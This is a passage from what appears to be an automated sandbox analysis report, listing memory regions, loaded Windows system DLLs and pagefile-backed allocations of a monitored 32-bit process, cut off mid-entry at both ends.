	          end_va = 0x71d5efff
	     entry_point = 0x71d30000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")

Region:
	              id = 1899
	        start_va = 0x72190000
	          end_va = 0x721befff
	     entry_point = 0x72190000
	     region_type = mapped_file
	            name = "logoncli.dll"
	        filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll")

Region:
	              id = 1900
	        start_va = 0x76680000
	          end_va = 0x766d2fff
	     entry_point = 0x76680000
	     region_type = mapped_file
	            name = "wldap32.dll"
	        filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll")

Region:
	              id = 1901
	        start_va = 0x772e0000
	          end_va = 0x7730afff
	     entry_point = 0x772e0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1902
	        start_va = 0x4a0000
	          end_va = 0x4a0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004a0000"
	        filename = ""

Region:
	              id = 1903
	        start_va = 0x4b0000
	          end_va = 0x4b0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004b0000"
	        filename = ""

Region:
	              id = 1904
	        start_va = 0x7b0000
	          end_va = 0x7e2fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007b0000"
	        filename = ""

Region:
	              id = 1905
	        start_va = 0x702b0000
	          end_va = 0x704bcfff
	     entry_point = 0x702b0000
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")

Region:
	              id = 1906
	        start_va = 0x772c0000
	          end_va = 0x772c5fff
	     entry_point = 0x772c0000
	     region_type = mapped_file
	            name = "psapi.dll"
	        filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")

Region:
	              id = 1907
	        start_va = 0x701e0000
	          end_va = 0x701f8fff
	     entry_point = 0x701e0000
	     region_type = mapped_file
	            name = "userenv.dll"
	        filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll")

Region:
	              id = 1908
	        start_va = 0x70210000
	          end_va = 0x702aafff
	     entry_point = 0x70210000
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")

Region:
	              id = 1909
	        start_va = 0x77490000
	          end_va = 0x774a2fff
	     entry_point = 0x77490000
	     region_type = mapped_file
	            name = "netapi32.dll"
	        filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll")

Region:
	              id = 1910
	        start_va = 0x6ff70000
	          end_va = 0x6ff84fff
	     entry_point = 0x6ff70000
	     region_type = mapped_file
	            name = "samcli.dll"
	        filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll")

Region:
	              id = 1911
	        start_va = 0x6ff60000
	          end_va = 0x6ff69fff
	     entry_point = 0x6ff60000
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")

Region:
	              id = 1912
	        start_va = 0x7f0000
	          end_va = 0x82ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007f0000"
	        filename = ""

Region:
	              id = 1913
	        start_va = 0x1fb0000
	          end_va = 0x20affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000001fb0000"
	        filename = ""

Region:
	              id = 1914
	        start_va = 0x2150000
	          end_va = 0x2486fff
	     entry_point = 0x2150000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1915
	        start_va = 0x830000
	          end_va = 0x86ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000830000"
	        filename = ""

Region:
	              id = 1916
	        start_va = 0x2490000
	          end_va = 0x258ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002490000"
	        filename = ""

Region:
	              id = 1917
	        start_va = 0x2590000
	          end_va = 0x268ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002590000"
	        filename = ""

Region:
	              id = 1918
	        start_va = 0x2690000
	          end_va = 0x288ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002690000"
	        filename = ""

Region:
	              id = 1919
	        start_va = 0x2890000
	          end_va = 0x2991fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002890000"
	        filename = ""

Region:
	              id = 1920
	        start_va = 0x29a0000
	          end_va = 0x2aa1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000029a0000"
	        filename = ""

Region:
	              id = 1921
	        start_va = 0x2ab0000
	          end_va = 0x2c2efff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002ab0000"
	        filename = ""

Region:
	              id = 1922
	        start_va = 0x2c30000
	          end_va = 0x2dabfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c30000"
	        filename = ""

Region:
	              id = 1923
	        start_va = 0x2890000
	          end_va = 0x2a8bfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002890000"
	        filename = ""

Region:
	              id = 1924
	        start_va = 0x2db0000
	          end_va = 0x2fa9fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002db0000"
	        filename = ""

Region:
	              id = 1925
	        start_va = 0x2fb0000
	          end_va = 0x3231fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002fb0000"
	        filename = ""

Region:
	              id = 1926
	        start_va = 0x2a90000
	          end_va = 0x2d11fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002a90000"
	        filename = ""

Region:
	              id = 1927
	        start_va = 0x3240000
	          end_va = 0x353dfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003240000"
	        filename = ""

Region:
	              id = 1928
	        start_va = 0x2d20000
	          end_va = 0x3018fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002d20000"
	        filename = ""

Region:
	              id = 1930
	        start_va = 0x3540000
	          end_va = 0x38adfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003540000"
	        filename = ""

Region:
	              id = 1931
	        start_va = 0x2890000
	          end_va = 0x2c03fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002890000"
	        filename = ""

Region:
	              id = 1932
	        start_va = 0x3020000
	          end_va = 0x33f0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003020000"
	        filename = ""

Region:
	              id = 1933
	        start_va = 0x2c10000
	          end_va = 0x2fd1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c10000"
	        filename = ""

Region:
	              id = 1934
	        start_va = 0x3400000
	          end_va = 0x3993fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003400000"
	        filename = ""

Region:
	              id = 1935
	        start_va = 0x39a0000
	          end_va = 0x3f37fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000039a0000"
	        filename = ""

Region:
	              id = 1959
	        start_va = 0x3f40000
	          end_va = 0x44d4fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003f40000"
	        filename = ""

Region:
	              id = 1961
	        start_va = 0x721f0000
	          end_va = 0x724bafff
	     entry_point = 0x721f0000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")

Region:
	              id = 1962
	        start_va = 0x4c0000
	          end_va = 0x4c0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000004c0000"
	        filename = ""

Region:
	              id = 1963
	        start_va = 0x4d0000
	          end_va = 0x4d0fff
	     entry_point = 0x4d0000
	     region_type = mapped_file
	            name = "counters.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat")

Region:
	              id = 1964
	        start_va = 0x70b90000
	          end_va = 0x70ba1fff
	     entry_point = 0x70b90000
	     region_type = mapped_file
	            name = "ondemandconnroutehelper.dll"
	        filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")

Region:
	              id = 1965
	        start_va = 0x6fff0000
	          end_va = 0x7001cfff
	     entry_point = 0x6fff0000
	     region_type = mapped_file
	            name = "winscard.dll"
	        filename = "\\Windows\\SysWOW64\\WinSCard.dll" (normalized: "c:\\windows\\syswow64\\winscard.dll")

Region:
	              id = 1966
	        start_va = 0x72770000
	          end_va = 0x72791fff
	     entry_point = 0x72770000
	     region_type = mapped_file
	            name = "devobj.dll"
	        filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll")

Region:
	              id = 1967
	        start_va = 0x77050000
	          end_va = 0x771c7fff
	     entry_point = 0x77050000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")

Region:
	              id = 1968
	        start_va = 0x772d0000
	          end_va = 0x772ddfff
	     entry_point = 0x772d0000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")

Region:
	              id = 1969
	        start_va = 0x20b0000
	          end_va = 0x20effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000020b0000"
	        filename = ""

Region:
	              id = 1970
	        start_va = 0x2890000
	          end_va = 0x298ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002890000"
	        filename = ""

Region:
	              id = 1971
	        start_va = 0x6ff40000
	          end_va = 0x6ff5bfff
	     entry_point = 0x6ff40000
	     region_type = mapped_file
	            name = "srvcli.dll"
	        filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll")

Region:
	              id = 1972
	        start_va = 0x6ff20000
	          end_va = 0x6ff32fff
	     entry_point = 0x6ff20000
	     region_type = mapped_file
	            name = "samlib.dll"
	        filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll")

Region:
	              id = 1973
	        start_va = 0x6ff10000
	          end_va = 0x6ff1efff
	     entry_point = 0x6ff10000
	     region_type = mapped_file
	            name = "browcli.dll"
	        filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll")

Region:
	              id = 1974
	        start_va = 0x6fee0000
	          end_va = 0x6ff03fff
	     entry_point = 0x6fee0000
	     region_type = mapped_file
	            name = "winmm.dll"
	        filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll")

Region:
	              id = 1975
	        start_va = 0x6feb0000
	          end_va = 0x6fed2fff
	     entry_point = 0x6feb0000
	     region_type = mapped_file
	            name = "winmmbase.dll"
	        filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll")

Region:
	              id = 1977
	        start_va = 0x71ea0000
	          end_va = 0x71eeefff
	     entry_point = 0x71ea0000
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")

Region:
	              id = 1978
	        start_va = 0x70200000
	          end_va = 0x70207fff
	     entry_point = 0x70200000
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll")

Region:
	              id = 1979
	        start_va = 0x774b0000
	          end_va = 0x774b6fff
	     entry_point = 0x774b0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")

Region:
	              id = 1980
	        start_va = 0x20f0000
	          end_va = 0x212ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000020f0000"
	        filename = ""

Region:
	              id = 1981
	        start_va = 0x2990000
	          end_va = 0x2a8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002990000"
	        filename = ""

Region:
	              id = 1982
	        start_va = 0x2a90000
	          end_va = 0x2acffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002a90000"
	        filename = ""

Region:
	              id = 1983
	        start_va = 0x2ad0000
	          end_va = 0x2bcffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002ad0000"
	        filename = ""

Region:
	              id = 1984
	        start_va = 0x71d60000
	          end_va = 0x71de3fff
	     entry_point = 0x71d60000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")

Region:
	              id = 1985
	        start_va = 0x704c0000
	          end_va = 0x7063dfff
	     entry_point = 0x704c0000
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")

Region:
	              id = 1986
	        start_va = 0x4e0000
	          end_va = 0x4e0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000004e0000"
	        filename = ""

Region:
	              id = 1987
	        start_va = 0x6fea0000
	          end_va = 0x6feaffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000006fea0000"
	        filename = ""

Region:
	              id = 1988
	        start_va = 0x870000
	          end_va = 0x870fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000870000"
	        filename = ""

Region:
	              id = 1989
	        start_va = 0x2bd0000
	          end_va = 0x2c0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bd0000"
	        filename = ""

Region:
	              id = 1990
	        start_va = 0x2c10000
	          end_va = 0x2d0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c10000"
	        filename = ""

Region:
	              id = 1991
	        start_va = 0x2130000
	          end_va = 0x2130fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002130000"
	        filename = ""

Region:
	              id = 1992
	        start_va = 0x2d10000
	          end_va = 0x2d11fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002d10000"
	        filename = ""

Region:
	              id = 1993
	        start_va = 0x2d20000
	          end_va = 0x2d20fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002d20000"
	        filename = ""

Region:
	              id = 1994
	        start_va = 0x2d30000
	          end_va = 0x312afff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002d30000"
	        filename = ""

Region:
	              id = 1995
	        start_va = 0x3130000
	          end_va = 0x313ffff
	     entry_point = 0x3130000
	     region_type = mapped_file
	            name = "wkscli.dll"
	        filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll")

Region:
	              id = 1996
	        start_va = 0x74330000
	          end_va = 0x7434afff
	     entry_point = 0x74330000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")

Region:
	              id = 1997
	        start_va = 0x70070000
	          end_va = 0x70082fff
	     entry_point = 0x70070000
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")

Region:
	              id = 1998
	        start_va = 0x70040000
	          end_va = 0x7006efff
	     entry_point = 0x70040000
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")

Region:
	              id = 1999
	        start_va = 0x3140000
	          end_va = 0x314ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003140000"
	        filename = ""

Region:
	              id = 2000
	        start_va = 0x3150000
	          end_va = 0x324ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003150000"
	        filename = ""

Region:
	              id = 2001
	        start_va = 0x3250000
	          end_va = 0x3267fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003250000"
	        filename = ""

Region:
	              id = 2002
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2003
	        start_va = 0x4ce0000
	          end_va = 0x54dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004ce0000"
	        filename = ""

Region:
	              id = 2004
	        start_va = 0x3270000
	          end_va = 0x328ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003270000"
	        filename = ""

Region:
	              id = 2005
	        start_va = 0x3250000
	          end_va = 0x326ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000003250000"
	        filename = ""

Region:
	              id = 2006
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2007
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2008
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2009
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2010
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2011
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2012
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2013
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2014
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2015
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2016
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2017
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2018
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2019
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2020
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2021
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2022
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2023
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2024
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2025
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2026
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2027
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2028
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2029
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2030
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2031
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2032
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2033
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2034
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2035
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2036
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2037
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2038
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2039
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2040
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2042
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2043
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2044
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2045
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2046
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2047
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2048
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2049
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2050
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2051
	        start_va = 0x3250000
	          end_va = 0x328ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003250000"
	        filename = ""

Region:
	              id = 2052
	        start_va = 0x3290000
	          end_va = 0x338ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003290000"
	        filename = ""

Region:
	              id = 2053
	        start_va = 0x3390000
	          end_va = 0x33cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003390000"
	        filename = ""

Region:
	              id = 2054
	        start_va = 0x4ce0000
	          end_va = 0x4ddffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004ce0000"
	        filename = ""

Region:
	              id = 2055
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2056
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2057
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2058
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2059
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2060
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2061
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2062
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2063
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2064
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2065
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2066
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2067
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2068
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2069
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000044e0000"
	        filename = ""

Region:
	              id = 2070
	        start_va = 0x44e0000
	          end_va = 0x4cdffff
